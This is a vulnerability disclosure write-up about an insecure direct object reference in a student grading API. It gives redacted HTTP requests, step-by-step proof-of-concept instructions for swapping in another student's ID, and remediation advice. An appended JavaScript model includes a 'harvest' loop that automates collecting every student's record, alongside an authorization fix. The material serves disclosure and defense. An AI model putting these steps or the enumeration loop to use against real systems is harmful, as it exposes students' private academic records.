Write-up Executive Summary
This vulnerability is an Insecure Direct Object Reference (IDOR) in the 'stuno' parameter of an API call that retrieves grading information. Modifying a GET request to the API endpoint so that the 'stuno' value equals another student's ID returned that student's full grading history. No authorization check was performed; the server never compared the requested 'stuno' to the authenticated user. The risk is elevated by the fact that student IDs are readily available within the student population.
An attacker could trivially automate these GET requests to mass-collect sensitive student information.
Vulnerability Details
Understanding how the web page retrieves the grading information is straightforward: two JSON GET requests are made.
For privacy reasons, the URLs have been redacted. In addition, all IDs, numbers, and program descriptions below have been modified from their original values:
1st Request:
GET /redacted/redacted/redacted?stuno=0123456789 HTTP/1.1
Host: redacted
Cookie: redacted
Sec-Ch-Ua-Platform: "macOS"
Authorization: redacted
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/plain, */*
Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: redacted
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

Response:
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 93
Connection: keep-alive
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Expires: 0
X-Powered-By: Express
Access-Control-Allow-Origin: redacted
Access-Control-Allow-Methods: redacted
Access-Control-Allow-Headers: redacted
Via: redacted
[
{
"degreeProgramCode":"1234",
"degreeProgramDescription":"Communications"
}
]

The response gives us a degreeProgramCode value; this value is then passed as the 'dprog' parameter of the second GET request, which actually retrieves the student's grading information.
2nd Request:
GET /redacted/redacted/redacted?stuno=0123456789&dprog=1234 HTTP/1.1
Host: redacted
Cookie: redacted
Sec-Ch-Ua-Platform: "macOS"
Authorization: redacted
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/plain, */*
Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: redacted
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

Response:
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 34723
Connection: keep-alive
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Expires: 0
X-Powered-By: Express
Access-Control-Allow-Origin: redacted
Access-Control-Allow-Methods: redacted
Access-Control-Allow-Headers: redacted
Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Expires: 0
Surrogate-Control: no-store
Via: 1.1 redacted
[
{
"darout":"PREPARED: xx/xx/25 - xx:xx"
},
{
"darout":"PROGRAM: 1234 CATALOG YEAR: 20231"
},
{
"darout":"DEGREE PROGRESS REPORT"
.
.
.
.
]

The second response is truncated here for space and privacy reasons, but it returns all of the student's grading data.
Proof of Concept
All someone needs to do to replicate this vulnerability:
1. Intercept both GET requests.
2. Modify the 'stuno' parameter within the first GET request to equal the ID of another student. Example with a student ID of 9876543210:
GET /redacted/redacted/redacted?stuno=9876543210
3. Record the value of 'degreeProgramCode' in the response.
4. Modify the 'stuno' parameter with the other student's ID and the 'dprog' parameter with the newly returned 'degreeProgramCode' value:
GET /redacted/redacted/redacted?stuno=9876543210&dprog=4321
5. Record the response.
Remediation and Fixes
A quick mitigation would be to stop passing raw student IDs as parameter values and use an encrypted or otherwise opaque reference instead, so that a user cannot simply substitute another student's ID. That only raises the cost of guessing, though: student IDs circulate freely, and any reference that maps one-to-one to a student still leaks once the mapping is learned. The comprehensive fix is to enforce authorization on the API endpoints themselves: tie the 'stuno' parameter to the authenticated session (or drop the parameter and derive the student from the session) and refuse requests for any other individual's ID. Both requests need the check, since the second one returns the grading data directly to anyone who already knows a valid 'dprog' value.
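The following is an added example, not code from the original write-up or the affected system. It models the two chained endpoints in memory so that both the proof of concept above and the remediation can be run offline: a vulnerable handler pair that trusts the 'stuno' query parameter, the same handlers wrapped in an authorization check that binds 'stuno' to the authenticated session, and the two-step enumeration loop an attacker would automate. All student records, IDs and the session shape are constructed, and the middleware name `requireOwnRecord` is hypothetical; the real paths and authentication scheme are redacted in the report.

```javascript
// Added example, not code from the original write-up. Models the two chained
// endpoints in memory: vulnerable handlers that trust `stuno`, the same handlers
// behind an authorization check, and the enumeration loop an attacker would run.
// All records, IDs and the session shape are constructed.

// Constructed student records keyed by student number. Values are invented.
const STUDENTS = {
  '0123456789': {
    dprog: '1234',
    program: 'Communications',
    report: ['PREPARED: xx/xx/25 - xx:xx', 'PROGRAM: 1234 CATALOG YEAR: 20231', 'DEGREE PROGRESS REPORT'],
  },
  '9876543210': {
    dprog: '4321',
    program: 'Biology',
    report: ['PREPARED: xx/xx/25 - xx:xx', 'PROGRAM: 4321 CATALOG YEAR: 20221', 'DEGREE PROGRESS REPORT'],
  },
  '5555555555': {
    dprog: '7777',
    program: 'History',
    report: ['PREPARED: xx/xx/25 - xx:xx', 'PROGRAM: 7777 CATALOG YEAR: 20241', 'DEGREE PROGRESS REPORT'],
  },
};

// A request as the server sees it. `session.stuno` stands in for whatever the
// Cookie / Authorization header resolves to server-side; `query` is the URL query.
function makeRequest(sessionStuno, query) {
  return { session: { stuno: sessionStuno }, query };
}

// Vulnerable handlers: the lookup key comes straight from the query string and is
// never compared with the authenticated principal. This is the behaviour observed.
const vulnerableApi = {
  // GET ...?stuno=<id>  ->  [{ degreeProgramCode, degreeProgramDescription }]
  degreeProgram(req) {
    const s = STUDENTS[req.query.stuno];
    if (!s) return { status: 404, body: [] };
    return {
      status: 200,
      body: [{ degreeProgramCode: s.dprog, degreeProgramDescription: s.program }],
    };
  },
  // GET ...?stuno=<id>&dprog=<code>  ->  [{ darout }, ...]
  degreeReport(req) {
    const s = STUDENTS[req.query.stuno];
    if (!s || s.dprog !== req.query.dprog) return { status: 404, body: [] };
    return { status: 200, body: s.report.map((line) => ({ darout: line })) };
  },
};

// Fix: a hypothetical Express-style authorization wrapper that runs before either
// handler and refuses any request whose `stuno` is not the caller's own. The
// lookup code is unchanged; only the check is added.
function requireOwnRecord(handler) {
  return (req) => {
    const caller = req.session && req.session.stuno;
    if (!caller || caller !== req.query.stuno) {
      return { status: 403, body: { error: 'forbidden' } };
    }
    return handler(req);
  };
}

const hardenedApi = {
  degreeProgram: requireOwnRecord(vulnerableApi.degreeProgram),
  degreeReport: requireOwnRecord(vulnerableApi.degreeReport),
};

// The chain from the write-up: call 1 yields degreeProgramCode, call 2 uses it as
// dprog. Returns the report lines, or null if either call is refused or finds nothing.
function pullReport(api, sessionStuno, targetStuno) {
  const r1 = api.degreeProgram(makeRequest(sessionStuno, { stuno: targetStuno }));
  if (r1.status !== 200 || r1.body.length === 0) return null;
  const dprog = r1.body[0].degreeProgramCode;
  const r2 = api.degreeReport(makeRequest(sessionStuno, { stuno: targetStuno, dprog }));
  return r2.status === 200 ? r2.body.map((row) => row.darout) : null;
}

// Mass collection with one legitimate session over a list of known student IDs.
// Returns a map of stuno -> report lines for every ID the API handed over.
function harvest(api, sessionStuno, candidateIds) {
  const collected = {};
  for (const id of candidateIds) {
    const report = pullReport(api, sessionStuno, id);
    if (report) collected[id] = report;
  }
  return collected;
}

if (typeof require !== 'undefined' && require.main === module) {
  const ids = Object.keys(STUDENTS);
  // Logged in as 0123456789, the vulnerable API hands over all three records.
  console.log('vulnerable:', Object.keys(harvest(vulnerableApi, '0123456789', ids)));
  // The hardened API returns only the caller's own record; the rest are 403s.
  console.log('hardened:  ', Object.keys(harvest(hardenedApi, '0123456789', ids)));
}
```

Run with `node` to see the difference: with the vulnerable handlers one session collects every record in the list, while with the wrapper only the caller's own record comes back. Note that the wrapper is applied to both endpoints; protecting only the first would still let anyone who already knows a student's 'dprog' value fetch the report directly. Obfuscating the ID would change nothing here, because the check compares the requested identity with the session's identity rather than relying on the ID being hard to guess.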